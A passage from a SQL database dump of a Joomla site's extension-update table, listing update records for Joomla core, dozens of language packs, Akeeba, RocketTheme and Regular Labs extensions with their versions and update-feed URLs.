Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21643,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21644,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21645,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21646,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21647,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21648,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21649,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21650,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21651,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21652,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21653,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21654,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21655,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21656,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21657,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21658,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21659,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21660,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21661,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21662,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21663,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21664,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21665,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21666,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21667,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21668,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21669,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21670,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21671,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21672,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21673,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21674,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21675,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21676,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21677,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21678,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21679,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21680,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21681,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21682,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21683,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21684,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21685,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21686,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21687,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21688,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21689,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21690,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21691,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21692,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21693,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21694,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21695,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21696,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21697,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21698,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21699,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21700,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21701,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21702,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21703,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21704,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21705,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21706,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21707,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21708,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21709,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21710,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21711,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21712,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21713,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21714,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21715,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21716,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21717,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21718,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21719,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21720,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21721,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21722,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21723,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21724,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21725,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21726,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21727,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21728,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21729,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21730,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21731,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21732,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21733,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21734,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21735,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21736,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21737,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21738,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21739,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21740,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21741,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21742,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21743,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21744,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21745,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21746,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21747,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21748,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21749,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21750,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21751,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21752,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21753,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21754,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21755,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21756,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21757,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21758,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21759,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21760,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21761,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21762,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21763,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21764,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21765,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21766,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21767,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21768,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21769,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21770,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21771,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21772,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21773,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21774,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21775,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21776,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21777,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21778,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21779,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21780,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21781,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21782,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21783,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21784,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21785,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21786,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21787,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21788,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21789,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21790,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21791,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21792,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21793,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21794,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21795,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21796,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21797,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21798,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21799,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21800,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21801,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21802,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21803,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21804,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21805,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21806,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21807,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21808,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21809,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21810,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21811,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21812,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21813,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21814,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21815,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21816,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21817,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21818,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21819,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21820,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21821,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21822,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21823,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21824,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21825,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21826,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21827,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21828,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21829,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21830,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21831,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21832,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21833,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21834,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21835,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21836,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21837,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21838,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21839,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21840,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21841,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21842,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21843,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21844,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21845,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21846,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21847,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21848,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21849,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21850,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21851,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21852,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21853,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21854,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21855,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21856,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21857,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21858,57,0,'Dari 